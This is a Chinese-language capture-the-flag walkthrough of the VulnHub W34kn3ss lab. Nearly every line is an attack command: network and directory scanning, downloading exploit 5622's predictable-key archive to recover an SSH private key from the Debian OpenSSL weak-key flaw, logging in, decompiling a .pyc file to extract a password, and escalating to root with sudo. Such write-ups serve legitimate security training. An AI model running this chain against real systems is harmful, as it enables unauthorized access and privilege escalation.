虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/w34kn3ss-1,270/
虚拟机简介:你的目标是帮助 neo 以“root”身份访问这台机器
目标:1个flag
级别:中级
arp-scan 192.168.207.0/24
nmap -A -sS -sV -v -p- 192.168.207.134
查看开放22、80、443端口
访问站点显示Apache默认页面
使用dirb进行网站目录扫描,发现test目录可以访问,没有发现有用信息
dirb http://192.168.207.137
通过nmap端口扫描,发现443端口提示有域名信息,可以绑定hosts访问
vim /etc/hosts
访问网站首页,发现有一个提示信息
重新使用dirb进行扫描,发现有隐藏目录
dirb http://weakness.jth
访问爆破目录,发现有两个文件信息
在note.txt中提示密码为0.9.8c-1创建的密钥
使用searchsploit搜索相关漏洞
searchsploit openssl 0.9.8c-1
复制漏洞信息到当前路径下
searchsploit -m 5622
cat 5622.txt
下载密钥文件并解压,通过获取到的mykey.pub内容进行对比
wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
tar jxvf 5622.tar.bz2
cd rsa/2048
grep -r -l "AAAAB3NzaC1yc2EAAAABIwAAAQEApC39uhie9gZahjiiMo+k8DOqKLujcZMN1bESzSLT8H5jRGj8n1FFqjJw27Nu5JYTI73Szhg/uoeMOfECHNzGj7GtoMqwh38clgVjQ7Qzb47/kguAeWMUcUHrCBz9KsN+7eNTb5cfu0O0QgY+DoLxuwfVufRVNcvaNyo0VS1dAJWgDnskJJRD+46RlkUyVNhwegA0QRj9Salmpssp+z5wq7KBPL1S982QwkdhyvKg3dMy29j/C5sIIqM/mlqilhuidwo1ozjQlU2+yAVo5XrWDo0qVzzxsnTxB5JAfF7ifoDZp2yczZg+ZavtmfItQt1Vac1vSuBPCpTqkjE/4Iklgw=="
ssh -i 4161de56829de2fe64b9055711f531c1-2537 [email protected]
发现本地目录中存在2个文件,其中code为python2.7生成的文件
把python文件复制到www目录中进行下载
cp code /var/www/html
wget http://192.168.207.137/code
安装解码库,并解析python代码文件
pip2 install uncompyle6
cp code code.pyc
uncompyle6 -o . code.pyc
已重新生成新的py文件
代码中通过用户名和密码生成HASH文件,获取到用户名为:n30
,密码为:dMASDNB!!#B!#!#33
cat code.py
当前用户拥有所有的sudo权限
sudo -l
可以直接获取到获取root权限
sudo -i